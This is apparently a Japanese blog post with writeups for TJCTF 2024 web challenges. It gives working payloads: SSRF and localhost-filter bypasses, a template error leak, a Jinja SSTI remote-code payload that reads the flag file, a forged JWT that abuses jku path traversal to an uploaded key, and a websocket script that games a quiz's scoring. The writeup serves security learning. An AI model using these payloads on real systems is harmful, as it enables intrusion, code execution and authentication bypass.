はまやんはまやんはまやん

hamayanhamayan's blog

TJCTF 2024 Writeups

https://ctftime.org/event/2321

web/frog

ソースコード無し。ribbit ribbit ribbit :( robbit robbit robbit :(と言われる。息をするように/robots.txtにアクセスする。

User-agent: *
Disallow: /secret-frogger-78570618/

/secret-frogger-78570618/にアクセスすると大量のカエルアイコンが表示される。ソースコードを見ると、1つにだけリンクが張られている。/secret-frogger-78570618/flag-ed8f2331.txtにアクセスするとフラグ獲得。

web/reader

ソースコード有り。flagの場所を確認しよう。

@app.route("/monitor")
def monitor():
    if request.remote_addr in ("localhost", "127.0.0.1"):
        return render_template(
            "admin.html", message=flag, errors="".join(log) or "No recent errors"
        )
    else:
        return render_template("admin.html", message="Unauthorized access", errors="")

/monitorに内部からアクセスできればフラグが手に入る。サイトはSSRF出来そうなインターフェースをしているのでDockerfileでポート5000が開放されているのを参考にhttp://127.0.0.1:5000/monitorを入力するとフラグが得られる。

web/fetcher

ソースコード有り。フラグの場所を確認しよう。

app.get('/flag', (req, res) => {
    if (req.ip !== '::ffff:127.0.0.1' && req.ip !== '::1' && req.ip !== '127.0.0.1')
        return res.send('bad ip');

    res.send(`hey myself! here's your flag: ${flag}`);
});

ipが内部IPであればフラグがもらえそう。内部に通信しそうな所を探すと以下。

app.post('/fetch', async (req, res) => {
    const url = req.body.url;

    if (!/^https?:\/\//.test(url))
        return res.send('invalid url');

    try {
        const checkURL = new URL(url);

        if (checkURL.host.includes('localhost') || checkURL.host.includes('127.0.0.1'))
            return res.send('invalid url');
    } catch (e) {
        return res.send('invalid url');
    }

    const r = await fetch(url, { redirect: 'manual' });

    const fetched = await r.text();

    res.send(fetched);
});

与えられたURLをパースして、localhost127.0.0.1なら弾く。localhostを指していい感じにbypass出来そうなものを適当に探してくるとhttp://[::]:3000/flagでフラグが得られた。

web/templater

ソースコード有り。

from flask import Flask, request, redirect
import re

app = Flask(__name__)

flag = open('flag.txt').read().strip()

template_keys = {
    'flag': flag,
    'title': 'my website',
    'content': 'Hello, {{name}}!',
    'name': 'player'
}

index_page = open('index.html').read()

@app.route('/')
def index_route():
    return index_page

@app.route('/add', methods=['POST'])
def add_template_key():
    key = request.form['key']
    value = request.form['value']
    template_keys[key] = value
    return redirect('/?msg=Key+added!')

@app.route('/template', methods=['POST'])
def template_route():
    s = request.form['template']
    
    s = template(s)

    if flag in s[0]:
        return 'No flag for you!', 403
    else:
        return s

def template(s):
    while True:
        m = re.match(r'.*({{.+?}}).*', s, re.DOTALL)
        if not m:
            break

        key = m.group(1)[2:-2]

        if key not in template_keys:
            return f'Key {key} not found!', 500

        s = s.replace(m.group(1), str(template_keys[key]))

    return s, 200

if __name__ == '__main__':
    app.run(port=5000)

ざっくり説明するとPOST /template{{key}}の形を手動で展開するテンプレートエンジンが動いていて、{{flag}}とするとフラグに変換してくれる。しかし、変換後のチェックでフラグが含まれているとNo flag for you!と言われるので、単純には取り出せない。…と、考えていると天啓が下りる。template関数の以下の部分を活用する。

if key not in template_keys:
    return f'Key {key} not found!', 500

この応答はそのまま出力に変えるので、うまくここに入れることができれば外部に持って来ることができそうである。つまり、{{{{flag}}}}というのを送る。初回で{{flag}}が変換され、{{tjctf{hogehoge}}}のようになり、次のループでtjctf{hogehogeがkeyとして認識されるが、これは辞書にはないのでエラー応答になって帰ってくる。テンプレートエンジンのフォーマットの問題でうまく末尾の}が消えるので出力時フィルタリングも回避し、}が抜けたフラグが手に入る。

web/music-checkout

ソースコード有り。読んでいくとSSTI脆弱性がある。不要な点を除いた関連部分を見てみると以下のようになる。

@app.route("/create_playlist", methods=["POST"])
def post_playlist():
    …
        username = request.form["username"]
    …
        filled = render_template("playlist.html", username=username, songs=text)
        this_id = str(uuid.uuid4())
        with open(f"templates/uploads/{this_id}.html", "w") as f:
            f.write(filled)
    …


@app.route("/view_playlist/<uuid:name>")
def view_playlist(name):
    name = str(name)
    …
        return render_template(f"uploads/{name}.html")
    …

playlist.htmlのusernameを見ると<p class="item">ORDER #0001 for {{ username|safe }}</p>となってsafeが付いているので邪魔もしない。ということでusernameに{{config}}を入れて表示させてみる。

ORDER #0001 for <Config {'DEBUG': False, 'TESTING': False, 'PROPAGATE_EXCEPTIONS': None, 'SECRET_KEY': None, 'PERMANENT_SESSION_LIFETIME': datetime.timedelta(days=31), 'USE_X_SENDFILE': False, 'SERVER_NAME': None, 'APPLICATION_ROOT': '/', 'SESSION_COOKIE_NAME': 'session', 'SESSION_COOKIE_DOMAIN': None, 'SESSION_COOKIE_PATH': None, 'SESSION_COOKIE_HTTPONLY': True, 'SESSION_COOKIE_SECURE': False, 'SESSION_COOKIE_SAMESITE': None, 'SESSION_REFRESH_EACH_REQUEST': True, 'MAX_CONTENT_LENGTH': None, 'SEND_FILE_MAX_AGE_DEFAULT': None, 'TRAP_BAD_REQUEST_ERRORS': None, 'TRAP_HTTP_EXCEPTIONS': False, 'EXPLAIN_TEMPLATE_LOADING': False, 'PREFERRED_URL_SCHEME': 'http', 'TEMPLATES_AUTO_RELOAD': None, 'MAX_COOKIE_SIZE': 4093}>

ok。いいですね。RCEしましょう。{{request.application.__globals__.__builtins__.__import__('os').popen('cat /app/flag.txt').read()}}をusernameにするとフラグが得られる。

web/topplecontainer

ソースコード有り。flagの場所を探すと以下にある。

@app.route("/flag")
@login_required()
def get_flag(user):
    if user["id"] == "admin":
        return flag
    else:
        return "admins only! shoo!"

GET /flagをadminユーザーで入れればフラグ。ログイン管理はJWTでやっていて以下のように検証している。

def verify_token(token):
    try:
        header = jwt.get_unverified_header(token)
        jku = header["jku"]
        with open(f"static/{jku}", "r") as f:
            keys = json.load(f)["keys"]
        kid = header["kid"]
        for key in keys:
            if key["kid"] == kid:
                public_key = jwt.algorithms.ECAlgorithm.from_jwk(key)
                payload = jwt.decode(token.encode(), public_key, algorithms=["ES256"])
                return payload
    except Exception:
        pass
    return None

jkuを使っていますね。任意のファイルがアップロードできれば検証を通過させられそう…と思っているとアップロードポイントがある。

@app.route("/upload", methods=["POST"])
@login_required()
def post_upload(user):
    if "file" not in request.files:
        return redirect(request.url + "?err=No+file+provided")
    file = request.files["file"]
    if file.filename == "":
        return redirect("/?err=Attached+file+has+no+name")
    if file:
        uid = user["id"]
        fid = str(uuid.uuid4())
        folder = os.path.join(os.getcwd(), f"uploads/{uid}")
        os.makedirs(folder, exist_ok=True)
        file.save(os.path.join(folder, fid))
        f = File(fid, file.filename, file.mimetype)
        if uid not in user_files:
            user_files[uid] = {}
        user_files[uid][fid] = f
    return redirect(f"/?success=Successfully+uploaded+file&path={uid}/{fid}")

ということで、アップロードして、それを参照させることで検証を通過させてみましょう。ECのキーペアを作成し、秘密鍵をPEM形式で、公開鍵はJWK形式で出力させます。ChatGPTが数秒で吐いてきたものが以下です。

from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives import serialization
from jwcrypto import jwk

# EC鍵ペアを生成
private_key = ec.generate_private_key(ec.SECP256R1())

# 秘密鍵をPEM形式でシリアライズ
private_pem = private_key.private_bytes(
    encoding=serialization.Encoding.PEM,
    format=serialization.PrivateFormat.TraditionalOpenSSL,
    encryption_algorithm=serialization.NoEncryption()
)
with open("ec_private_key.pem", "w") as private_file:
    private_file.write(private_pem.decode())

# 公開鍵をPEM形式でシリアライズ
public_key = private_key.public_key()
public_pem = public_key.public_bytes(
    encoding=serialization.Encoding.PEM,
    format=serialization.PublicFormat.SubjectPublicKeyInfo
)

# JWK形式に変換
jwk_public = jwk.JWK.from_pem(public_pem)

# JWK形式の鍵をファイルに保存
with open("ec_public_key.jwk", "w") as public_file:
    public_file.write(jwk_public.export())

print("鍵ペアをJWK形式でファイルに保存しました。")

ok.あとは、以下の手順でフラグが得られる。

  1. 以下のような形でkey.jsonを用意してアップロードする
{
    "keys": [
        <<< ここにec_public_key.jwk >>>
    ]
}
  1. jwt.ioとかで以下のようなJWTトークン作成
header
{
  "alg": "ES256",
  "jku": "../uploads/0d251448-ac71-4a1d-b702-136b1f2ad17d/bda5c410-5232-445f-8c1a-ff3a4b88a0ea", ← upload先
  "kid": "3mSwZOST2mdZvksPveW0VVzIkq0C0sEHwlxC3OhR4LE", ← 生成したキーペアのkid
  "typ": "JWT"
}

payload
{
  "id": "admin"
}
  1. 以下のようにGET /flagする
GET /flag HTTP/2
Host: topplecontainer.tjc.tf
Cookie: token=eyJhbGciOiJFUzI1NiIsImprdSI6Ii4uL3VwbG9hZHMvMGQyNTE0NDgtYWM3MS00YTFkLWI3MDItMTM2YjFmMmFkMTdkL2JkYTVjNDEwLTUyMzItNDQ1Zi04YzFhLWZmM2E0Yjg4YTBlYSIsImtpZCI6IjNtU3daT1NUMm1kWnZrc1B2ZVcwVlZ6SWtxMEMwc0VId2x4QzNPaFI0TEUiLCJ0eXAiOiJKV1QifQ.eyJpZCI6ImFkbWluIn0._k6T_FenUSRVYQ2g4Fu0lBUo8sNZXOtwtPRQdLTtKcjtu9Ye-89qxcZSAAW3Lkm9u1fMDkecCGoLDSBE6HLurQ

web/kaboot

ソースコード有り。Kahoot!のようなサイトが与えられる。フラグは以下にある。f'omg congrats, swiftie!!! {flag}' if get_score(scores, room_id, data['id']) >= 1000 * len(kahoot['questions']) else 'sucks to suck brooooooooo'にあるようにスコアが特定以上だともらえるようだ。

@sock.route('/room/<room_id>')
def room_sock(sock, room_id):
    sock.send(b64encode(kahoot['name'].encode()))
    scores = get_room_scores(room_id)
    for i, q in enumerate(kahoot['questions']):
        sock.send(b64encode(json.dumps({
            'send_time': time(),
            'scores': scores,
            **q,
        }).encode()))

        data = sock.receive()
        data = json.loads(b64decode(data).decode())

        send_time = data['send_time']
        recv_time = time()

        if (scores := get_room_scores(room_id)) is not None and send_time >= time():
            sock.send(b64encode(json.dumps({
                'scores': scores,
                'end': True,
                'message': '???'
            }).encode()))
            return

        if i == 0:
            edit_score(scores, room_id, data['id'], 0)

        if data['answer'] == q['answer']:
            edit_score(scores,
                       room_id,
                       data['id'],
                       get_score(scores, room_id, data['id']) + 1000 + max((send_time - recv_time) * 50, -500))

    sock.send(b64encode(json.dumps({
        'scores': scores,
        'end': True,
        'message': f'omg congrats, swiftie!!! {flag}' if get_score(scores, room_id, data['id']) >= 1000 * len(kahoot['questions']) else 'sucks to suck brooooooooo'
    }).encode()))

ソースコードを読んでもいいのですが、動かしてみるとwebsocket経由で

{"send_time": 1716177131.8692849, "scores": [], "question": "what is the best taylor swift song?", "answers": ["cruel summer", "daylight (stosp's version)", "all too well (10 minute version)", "all too well (5 minute version)"], "answer": 1}

このように、answerが帰ってきていたり、その応答として

{"id":"cfa6030d-6c73-c262-b872-b37e2c045dd3","answer":0,"send_time":1716177131.8692849}

というのを返す。最初、send_timeを未来のものにすればいいかとも思ったがif (scores := get_room_scores(room_id)) is not None and send_time >= time():で対策がされている。解法は、同じセッションでゲームをやり直すこと。この解法は以下の処理でブロックされているように見える。

if i == 0:
    edit_score(scores, room_id, data['id'], 0)

ここで、第三引数がdataから持ってきている所に違和感がある。dataはdata = sock.receive()にあるようにwebsocket経由で受け取ったものなので、外部から差し込み可能になっている。つまり、この初期化処理を別のidに対して行うことで初期化処理を回避できるのではないかという仮説が立ち、ソースを読んでみると実現可能であることが分かる。

def edit_score(scores, room_id, uid, new_score):
    for i, score_data in enumerate(scores):
        if score_data[1] == uid:
            scores[i][2] = new_score
            return scores

    all_scores.append([room_id, uid, new_score])
    scores.append(all_scores[-1])
    return scores


def get_score(scores, room_id, uid):
    for score_data in scores:
        if score_data[0] == room_id and score_data[1] == uid:
            return score_data[2]

    return 0

…

edit_score(scores,
            room_id,
            data['id'],
            get_score(scores, room_id, data['id']) + 1000 + max((send_time - recv_time) * 50, -500))

更新処理はこのような感じ。get_scoreで取得して、edit_scoreで取得している。room_idとuidで取得はしているが特に問題番号での重複確認とかは無く、取得して足して入れているだけ。ok. つまり、以下のような手順でやってやれば、2週目でも点数が合算されてフラグが手に入る。

  1. user1で1週クリアする(答えが問題文提供時に一緒に送られてくるので全問正解できる。自動化してもフラグ獲得までには届かない
  2. 2週目の1問目だけuser2にして答える。 {'id': 'user2', 'answer': resp'answer', 'send_time': 'send_time'} みたいにする
  3. 他の問題はuser1でクリアする

以下、上記の処理を自動化したもの(簡略化のため、1週目の1問目もuser2にしているが、そこは気にせず読んで下さい)。応答にフラグが出てくる。

import asyncio, websockets, binascii, random, string, json
from base64 import b64decode, b64encode

async def solve():
    #uri = "ws://localhost:4444"
    uri = 'wss://kaboot-b7598a0831b4faf3.tjc.tf'
    room_id = "".join(random.choices(string.ascii_letters, k=8))

    for _ in range(2):
        async with websockets.connect(uri + '/room/' + room_id) as websocket:
            resp = await websocket.recv()

            for i in range(10):
                resp = await websocket.recv()
                resp = json.loads(b64decode(resp).decode())

                print(resp)

                if 'end' in resp:
                    break

                await websocket.send(b64encode(json.dumps({
                    'id': 'user2' if i == 0 else 'user1',
                    'answer': resp['answer'],
                    'send_time': resp['send_time'],
                }).encode()))

            resp = await websocket.recv()
            resp = json.loads(b64decode(resp).decode())

            print(resp)
        
asyncio.get_event_loop().run_until_complete(solve())